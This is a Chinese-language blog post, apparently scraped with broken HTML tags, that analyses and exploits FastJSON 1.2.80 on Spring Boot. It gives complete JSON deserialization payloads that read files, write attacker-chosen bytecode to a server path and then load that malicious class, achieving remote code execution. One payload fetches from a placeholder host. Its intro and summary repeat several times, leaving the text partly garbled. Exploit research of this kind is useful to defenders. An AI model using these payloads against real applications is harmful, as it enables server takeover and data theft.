Spring + FastJSON RCE漏洞分析与利用<\/h1>

前言<\/h2>
在Spring环境下无法直接上传JSP木马实现RCE，通常需要通过控制加载class或jar包来实现。FastJSON的高版本正好提供了这样的能力。<\/p>

环境搭建<\/h2>
依赖配置：<\/p>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.springframework.boot<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>spring-boot-starter<\/artifactId><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.springframework.boot<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>spring-boot-starter-web<\/artifactId><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>commons-io<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-io<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>2.2<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.aspectj<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>org.eclipse.jdt.core<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>1.9.22<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>com.alibaba<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>fastjson<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>1.2.80<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>Spring加载Class原理<\/h2>
Spring运行后大部分类不会加载，但有一些特殊类会被加载，如tomcat-docbase<\/code>。原理类似于SPI机制。<\/p>
启动Docker后，\/tmp<\/code>目录下会有一个随机命名的\/tomcat-docbase......\/WEB-INF\/classes\/<\/code>目录。如果该目录下有恶意class文件，就会被加载。但由于目录名随机，利用时需要先读取文件。<\/p>
FastJSON利用<\/h2>
读取文件<\/h3>
测试方法<\/strong>：<\/p>

在服务器或本地放置测试文件<\/li>
使用以下payload：<\/li>
<\/ol>
{
<\/span><\/span>    "a"<\/span>: {
<\/span><\/span>        "@type"<\/span>: "java.io.InputStream"<\/span>,
<\/span><\/span>        "@type"<\/span>: "org.apache.commons.io.input.BOMInputStream"<\/span>,
<\/span><\/span>        "delegate"<\/span>: {
<\/span><\/span>            "@type"<\/span>: "org.apache.commons.io.input.BOMInputStream"<\/span>,
<\/span><\/span>            "delegate"<\/span>: {
<\/span><\/span>                "@type"<\/span>: "org.apache.commons.io.input.ReaderInputStream"<\/span>,
<\/span><\/span>                "reader"<\/span>: {
<\/span><\/span>                    "@type"<\/span>: "jdk.nashorn.api.scripting.URLReader"<\/span>,
<\/span><\/span>                    "url"<\/span>: "http:\/\/ip\/1.txt"<\/span>
<\/span><\/span>                },
<\/span><\/span>                "charsetName"<\/span>: "UTF-8"<\/span>,
<\/span><\/span>                "bufferSize"<\/span>: "1024"<\/span>
<\/span><\/span>            },
<\/span><\/span>            "boms"<\/span>: [
<\/span><\/span>                {
<\/span><\/span>                    "charsetName"<\/span>: "UTF-8"<\/span>,
<\/span><\/span>                    "bytes"<\/span>: [102<\/span>]
<\/span><\/span>                }
<\/span><\/span>            ]
<\/span><\/span>        },
<\/span><\/span>        "boms"<\/span>: [
<\/span><\/span>            {
<\/span><\/span>                "charsetName"<\/span>: "UTF-8"<\/span>,
<\/span><\/span>                "bytes"<\/span>: [1<\/span>]
<\/span><\/span>            }
<\/span><\/span>        ]
<\/span><\/span>    },
<\/span><\/span>    "b"<\/span>: {
<\/span><\/span>        "$ref"<\/span>: "$.a.delegate"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>原理分析<\/strong>：<\/p>

org.apache.commons.io.input.BOMInputStream<\/code>构造函数接受InputStream<\/code>类型参数delegate<\/code>和ByteOrderMark<\/code>数组<\/li>
getBOM()<\/code>方法逻辑：

将delegate<\/code>输入流的字节码转为int数组<\/li>
用ByteOrderMark<\/code>里的bytes逐个比对<\/li>
比对错误返回null，全部正确返回ByteOrderMark<\/code>对象<\/li>
<\/ul>
<\/li>
ReaderInputStream<\/code>将Reader转为输入流<\/li>
URLReader<\/code>可以传入URL对象，支持file、jar、http等协议<\/li>
<\/ol>
写文件<\/h3>
必要依赖<\/strong>：<\/p>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>commons-io<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-io<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>2.7<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>Payload<\/strong>：<\/p>
{
<\/span><\/span>    "a"<\/span>: {
<\/span><\/span>        "@type"<\/span>: "java.io.InputStream"<\/span>,
<\/span><\/span>        "@type"<\/span>: "org.apache.commons.io.input.AutoCloseInputStream"<\/span>,
<\/span><\/span>        "in"<\/span>: {
<\/span><\/span>            "@type"<\/span>: "org.apache.commons.io.input.TeeInputStream"<\/span>,
<\/span><\/span>            "input"<\/span>: {
<\/span><\/span>                "@type"<\/span>: "org.apache.commons.io.input.CharSequenceInputStream"<\/span>,
<\/span><\/span>                "cs"<\/span>: {
<\/span><\/span>                    "@type"<\/span>: "java.lang.String"<\/span>,
<\/span><\/span>                    "value"<\/span>: "恶意字节码"<\/span>
<\/span><\/span>                },
<\/span><\/span>                "charset"<\/span>: "iso-8859-1"<\/span>,
<\/span><\/span>                "bufferSize"<\/span>: 1024<\/span>
<\/span><\/span>            },
<\/span><\/span>            "branch"<\/span>: {
<\/span><\/span>                "@type"<\/span>: "org.apache.commons.io.output.WriterOutputStream"<\/span>,
<\/span><\/span>                "writer"<\/span>: {
<\/span><\/span>                    "@type"<\/span>: "org.apache.commons.io.output.LockableFileWriter"<\/span>,
<\/span><\/span>                    "file"<\/span>: "写入路径"<\/span>,
<\/span><\/span>                    "charset"<\/span>: "iso-8859-1"<\/span>,
<\/span><\/span>                    "append"<\/span>: true<\/span>
<\/span><\/span>                },
<\/span><\/span>                "charsetName"<\/span>: "iso-8859-1"<\/span>,
<\/span><\/span>                "bufferSize"<\/span>: 1024<\/span>,
<\/span><\/span>                "writeImmediately"<\/span>: true<\/span>
<\/span><\/span>            },
<\/span><\/span>            "closeBranch"<\/span>: true<\/span>
<\/span><\/span>        }
<\/span><\/span>    },
<\/span><\/span>    "b"<\/span>: {
<\/span><\/span>        "@type"<\/span>: "java.io.InputStream"<\/span>,
<\/span><\/span>        "@type"<\/span>: "org.apache.commons.io.input.ReaderInputStream"<\/span>,
<\/span><\/span>        "reader"<\/span>: {
<\/span><\/span>            "@type"<\/span>: "org.apache.commons.io.input.XmlStreamReader"<\/span>,
<\/span><\/span>            "inputStream"<\/span>: {
<\/span><\/span>                "$ref"<\/span>: "$.a"<\/span>
<\/span><\/span>            },
<\/span><\/span>            "httpContentType"<\/span>: "text\/xml"<\/span>,
<\/span><\/span>            "lenient"<\/span>: false<\/span>,
<\/span><\/span>            "defaultEncoding"<\/span>: "iso-8859-1"<\/span>
<\/span><\/span>        },
<\/span><\/span>        "charsetName"<\/span>: "iso-8859-1"<\/span>,
<\/span><\/span>        "bufferSize"<\/span>: 1024<\/span>
<\/span><\/span>    },
<\/span><\/span>    "c"<\/span>: {
<\/span><\/span>        "@type"<\/span>: "java.io.InputStream"<\/span>,
<\/span><\/span>        "@type"<\/span>: "org.apache.commons.io.input.ReaderInputStream"<\/span>,
<\/span><\/span>        "reader"<\/span>: {
<\/span><\/span>            "@type"<\/span>: "org.apache.commons.io.input.XmlStreamReader"<\/span>,
<\/span><\/span>            "inputStream"<\/span>: {
<\/span><\/span>                "$ref"<\/span>: "$.a"<\/span>
<\/span><\/span>            },
<\/span><\/span>            "httpContentType"<\/span>: "text\/xml"<\/span>,
<\/span><\/span>            "lenient"<\/span>: false<\/span>,
<\/span><\/span>            "defaultEncoding"<\/span>: "iso-8859-1"<\/span>
<\/span><\/span>        },
<\/span><\/span>        "charsetName"<\/span>: "iso-8859-1"<\/span>,
<\/span><\/span>        "bufferSize"<\/span>: 1024<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键类分析<\/strong>：<\/p>


XmlStreamReader<\/code>构造函数：<\/p>
public<\/span> XmlStreamReader<\/span>(<\/span>InputStream is,<\/span> String httpContentType,<\/span> boolean<\/span> lenient,<\/span> String defaultEncoding)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    this<\/span>.<\/span>defaultEncoding<\/span> =<\/span> defaultEncoding;<\/span>
<\/span><\/span>    BOMInputStream bom =<\/span> new<\/span> BOMInputStream(<\/span>new<\/span> BufferedInputStream(<\/span>is,<\/span> 4096<\/span>),<\/span> false<\/span>,<\/span> BOMS);<\/span>
<\/span><\/span>    BOMInputStream pis =<\/span> new<\/span> BOMInputStream(<\/span>bom,<\/span> true<\/span>,<\/span> XML_GUESS_BYTES);<\/span>
<\/span><\/span>    this<\/span>.<\/span>encoding<\/span> =<\/span> this<\/span>.<\/span>doHttpStream<\/span>(<\/span>bom,<\/span> pis,<\/span> httpContentType,<\/span> lenient);<\/span>
<\/span><\/span>    this<\/span>.<\/span>reader<\/span> =<\/span> new<\/span> InputStreamReader(<\/span>pis,<\/span> this<\/span>.<\/span>encoding<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
最终会调用InputStream.read<\/code>方法<\/li>
<\/ul>
<\/li>

TeeInputStream<\/code>：<\/p>
public<\/span> TeeInputStream<\/span>(<\/span>InputStream input,<\/span> OutputStream branch,<\/span> boolean<\/span> closeBranch)<\/span> {<\/span>
<\/span><\/span>    super<\/span>(<\/span>input);<\/span>
<\/span><\/span>    this<\/span>.<\/span>branch<\/span> =<\/span> branch;<\/span>
<\/span><\/span>    this<\/span>.<\/span>closeBranch<\/span> =<\/span> closeBranch;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> int<\/span> read<\/span>()<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    int<\/span> ch =<\/span> super<\/span>.<\/span>read<\/span>();<\/span>
<\/span><\/span>    if<\/span> (<\/span>ch !=<\/span> -<\/span>1<\/span>)<\/span> {<\/span>
<\/span><\/span>        branch.<\/span>write<\/span>(<\/span>ch);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> ch;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
将输入流内容重定向到输出流<\/li>
<\/ul>
<\/li>

控制写入内容：<\/p>

使用ReaderInputStream<\/code> + CharSequenceReader<\/code><\/li>
CharSequenceReader.read<\/code>方法从字符串中读取内容<\/li>
<\/ul>
<\/li>
<\/ol>
加载Class<\/h3>
Payload<\/strong>：<\/p>
{
<\/span><\/span>    "@type"<\/span>: "java.lang.Exception"<\/span>,
<\/span><\/span>    "@type"<\/span>: "恶意类的名称,带上包名"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

第一次解析为Exception<\/code>类<\/li>
进入ThrowableDeserializer<\/code><\/li>
第二次checkAutoType<\/code>时expectClass<\/code>不为空，允许加载<\/li>
<\/ol>
总结<\/h2>
FastJSON的高版本绕过技术非常精妙，特别是写文件的payload设计。1.2.68版本的绕过技术更加精彩，值得深入研究。<\/p>
Spring + FastJSON RCE漏洞分析与利用<\/h1>

前言<\/h2> 在Spring环境下无法直接上传JSP木马实现RCE，通常需要通过控制加载class或jar包来实现。FastJSON的高版本正好提供了这样的能力。<\/p>

总结<\/h2> FastJSON的高版本绕过技术非常精妙，特别是写文件的payload设计。1.2.68版本的绕过技术更加精彩，值得深入研究。<\/p>

前言<\/h2>
在Spring环境下无法直接上传JSP木马实现RCE，通常需要通过控制加载class或jar包来实现。FastJSON的高版本正好提供了这样的能力。<\/p>

总结<\/h2>
FastJSON的高版本绕过技术非常精妙，特别是写文件的payload设计。1.2.68版本的绕过技术更加精彩，值得深入研究。<\/p>
